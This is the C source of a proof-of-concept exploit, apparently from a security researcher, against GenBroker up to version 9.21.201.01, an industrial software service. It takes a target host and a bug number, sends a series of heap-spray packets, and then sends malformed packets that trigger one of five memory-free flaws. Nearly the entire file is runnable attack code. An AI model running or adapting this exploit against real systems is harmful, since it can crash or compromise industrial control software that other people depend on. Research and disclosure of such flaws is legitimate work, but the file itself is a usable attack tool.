/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        38080
#define BUFFSZ      0x2000  // 0x4000 is the max but 0x2000 seems more compatible
#define ELEMENTS    0xfff



int send_gen(int sd, int type, u8 *data, int datasz);
int putss(u8 *data, u8 *str);
int putmm(u8 *data, u8 *str, int size);
int putcc(u8 *data, int chr, int size);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  linger  ling = {1,1};
    struct  sockaddr_in peer;
    int     sd,
            i,
            bug,
            type;
    u16     port    = PORT;
    u8      *host,
            *buff,
            *fill,
            *p,
            *f;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "GenBroker <= 9.21.201.01 multiple memory free vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%d)]\n"
            "\n"
            "Bugs:\n"
            " refer to the relative advisory for the available numbers\n"
            " and what vulnerabilities they test\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    p = buff;
    switch(bug) {
        case 1: {
            type = 0x4b0;
            p += putss(p, NULL);
            p += putss(p, NULL);
            p += putxx(p, 0, 32);
            p += putxx(p, 0, 32);
            p += putxx(p, 0, 32);
            p += putxx(p, 0, 32);
            p += putxx(p, 0, 32);           // elements of the first array (numbers)
            p += putxx(p, 0, 32);
            p += putxx(p, 0, 32);
            p += putxx(p, ELEMENTS, 32);    // elements of the second array (strings)
            p += putxx(p, ELEMENTS, 32);    // elements of the third array (strings
            break;
        }
        case 2: {
            type = 0x4b2;
            p += putxx(p, ELEMENTS, 32);
            break;
        }
        case 3: {
            type = 0x4b5;
            p += putss(p, NULL);
            p += putss(p, NULL);
            p += putxx(p, 0, 32);
            p += putxx(p, 0, 32);
            p += putxx(p, ELEMENTS, 32);
            break;
        }
        case 4: {
            type = 0xDAE;
            p += putxx(p, ELEMENTS, 32);
            break;
        }
        case 5: {
            type = 0x1bbc;
            p += putss(p, NULL);
            p += putss(p, NULL);
            p += putxx(p, 0, 32);
            p += putss(p, NULL);
            p += putss(p, NULL);
            p += putss(p, NULL);
            p += putxx(p, ELEMENTS, 32);
            break;
        }
        default: {
            printf("\nError: invalid bug number %d\n", bug);
            exit(1);
            break;
        }
    }

    // for this type of attack the data must be supplied before
    // the malformed packet so the following is useless
    //p += putcc(p, 0x41, BUFFSZ - (p - buff));   // good as string size too
    // send_gen automatically adjusts the size to 0x1ff4

    printf("- heap spray packets: ");
    fill = malloc(BUFFSZ);
    if(!fill) std_err();
    f = fill;
    f += putxx(f, 340, 32);
    f += putss(f, "parameter");
    f += putss(f, "value");
    for(i = 0; i < 340; i++) {
        f += putss(f, "AAAA");
        f += putss(f, "AAAA");
        f += putxx(f, 0x41414141, 32);
        f += putxx(f, 0x41414141, 32);
        f += putxx(f, 0x41414141, 32);
    }
    for(i = 0; i < 20; i++) {
        fputc('.', stdout);
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
        if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();
        send_gen(sd, 0x4b2, fill, f - fill);
        close(sd);
    }
    printf("\n");

    printf("- malformed packets:  ");
    for(i = 0; i < 10; i++) {
        fputc('.', stdout);
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
        if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();
        send_gen(sd, type, buff, p - buff);
        close(sd);
    }
    printf("\n");

    printf("- done\n");
    return(0);
}



int send_gen(int sd, int type, u8 *data, int datasz) {
    static u8   buff[BUFFSZ];
    static int  pck     = 1;
    int         t;
    u8          *p;

    t = 4 + 4 + 4 + datasz;
    if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;

    p = buff;
    p += putxx(p, 1,            16);
    p += putxx(p, htons(pck++), 16);
    p += putxx(p, htonl(1),     32);
    p += putxx(p, htonl(t),     32);

    p += putxx(p, 1,            32);
    p += putxx(p, 0,            32);
    p += putxx(p, type,         32);
    if(datasz > 0) p += putmm(p, data, datasz);

    if(send(sd, buff, p - buff, 0) < 0) return(-1);
    return(0);
}



int putss(u8 *data, u8 *str) {
    int     len;
    u8      *p;

    len = 0;
    if(str) len = strlen(str);

    p = data;
    if(len < 0xff) {
        p += putxx(p, len, 8);
    } else {
        p += putxx(p, 0xff, 8);
        p += putxx(p, len, 16);
    }
    p += putmm(p, str, len);
    return(p - data);
}



int putmm(u8 *data, u8 *str, int size) {
    if(size < 0) size = strlen(str);
    memcpy(data, str, size);
    return(size);
}



int putcc(u8 *data, int chr, int size) {
    memset(data, chr, size);
    return(size);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        //data[i] = num >> ((bytes - 1 - i) << 3);
        data[i] = num >> (i << 3);
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


